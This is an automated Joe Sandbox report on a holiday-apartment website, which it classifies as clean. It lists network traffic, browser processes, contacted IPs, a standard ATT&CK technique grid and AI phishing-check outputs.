Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49776 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49938 version: TLS 1.2
Source: classification engineClassification label: clean0.win@19/170@30/190
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1960,i,13317444094058092943,758684332971748344,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://dyserthwaterfalls.co.uk"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1960,i,13317444094058092943,758684332971748344,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.185.100
truefalse
    unknown
    dyserthwaterfalls.co.uk
    217.160.0.33
    truefalse
      unknown
      use.fontawesome.com
      unknown
      unknownfalse
        unknown
        cdn.ethers.io
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://dyserthwaterfalls.co.uk/false
            unknown
            https://dyserthwaterfalls.co.uk/contact-us/false
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              142.250.186.68
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.186.67
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.186.170
              unknownUnited States
              15169GOOGLEUSfalse
              172.67.142.245
              unknownUnited States
              13335CLOUDFLARENETUSfalse
              172.217.23.106
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.185.100
              www.google.comUnited States
              15169GOOGLEUSfalse
              142.250.185.227
              unknownUnited States
              15169GOOGLEUSfalse
              172.217.23.99
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.186.131
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.184.227
              unknownUnited States
              15169GOOGLEUSfalse
              216.58.212.170
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.184.195
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.185.67
              unknownUnited States
              15169GOOGLEUSfalse
              172.217.16.202
              unknownUnited States
              15169GOOGLEUSfalse
              1.1.1.1
              unknownAustralia
              13335CLOUDFLARENETUSfalse
              172.217.18.4
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.185.234
              unknownUnited States
              15169GOOGLEUSfalse
              217.160.0.33
              dyserthwaterfalls.co.ukGermany
              8560ONEANDONE-ASBrauerstrasse48DEfalse
              142.250.185.238
              unknownUnited States
              15169GOOGLEUSfalse
              142.251.173.84
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.181.227
              unknownUnited States
              15169GOOGLEUSfalse
              239.255.255.250
              unknownReserved
              unknownunknownfalse
              104.21.27.152
              unknownUnited States
              13335CLOUDFLARENETUSfalse
              172.217.18.106
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.186.142
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.186.164
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.185.74
              unknownUnited States
              15169GOOGLEUSfalse
              142.250.184.234
              unknownUnited States
              15169GOOGLEUSfalse
              IP
              192.168.2.17
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1541933
              Start date and time:2024-10-25 10:37:36 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsinteractivecookbook.jbs
              Sample URL:http://dyserthwaterfalls.co.uk
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:14
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • EGA enabled
              Analysis Mode:stream
              Analysis stop reason:Timeout
              Detection:CLEAN
              Classification:clean0.win@19/170@30/190
              • Exclude process from analysis (whitelisted): TextInputHost.exe
              • Excluded IPs from analysis (whitelisted): 172.217.23.99, 142.250.186.142, 142.251.173.84, 34.104.35.123
              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
              • Not all processes where analyzed, report is missing behavior information
              • VT rate limit hit for: http://dyserthwaterfalls.co.uk
              InputOutput
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": true,
                "trigger_text": "We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking \"Accept\", you consent to the use of ALL the cookies.",
                "prominent_button_name": "ACCEPT",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": []
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": []
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "Contact The Waterfall Apartments",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": [
                  "Address",
                  "Phone Number",
                  "Email Address"
                ],
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: gpt-4o
              ```json{  "legit_domain": "unknown",  "classification": "unknown",  "reasons": [    "The URL 'dyserthwaterfalls.co.uk' does not directly match any well-known brand associated with 'Waterfall Apartments'.",    "The brand 'Waterfall Apartments' is not widely recognized or associated with a specific well-known domain.",    "The URL appears to be related to a geographical location (Dyserth Waterfalls) rather than a brand.",    "There are no obvious misspellings or suspicious elements in the URL itself.",    "The input fields (Address, Phone Number, Email Address) are common for legitimate sites but can also be used in phishing attempts."  ],  "riskscore": 5}
              URL: dyserthwaterfalls.co.uk
                          Brands: Waterfall Apartments
                          Input Fields: Address, Phone Number, Email Address
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "contains_trigger_text": false,
                "trigger_text": "unknown",
                "prominent_button_name": "unknown",
                "text_input_field_labels": "unknown",
                "pdf_icon_visible": false,
                "has_visible_captcha": false,
                "has_urgent_text": false,
                "has_visible_qrcode": false
              }
              URL: https://dyserthwaterfalls.co.uk/contact-us/ Model: claude-3-haiku-20240307
              ```json
              {
                "brands": [
                  "Waterfall Apartments"
                ]
              }
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:38:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2677
              Entropy (8bit):3.987800340504889
              Encrypted:false
              SSDEEP:
              MD5:6B2099B53CF923F6C33FD63BED2321AA
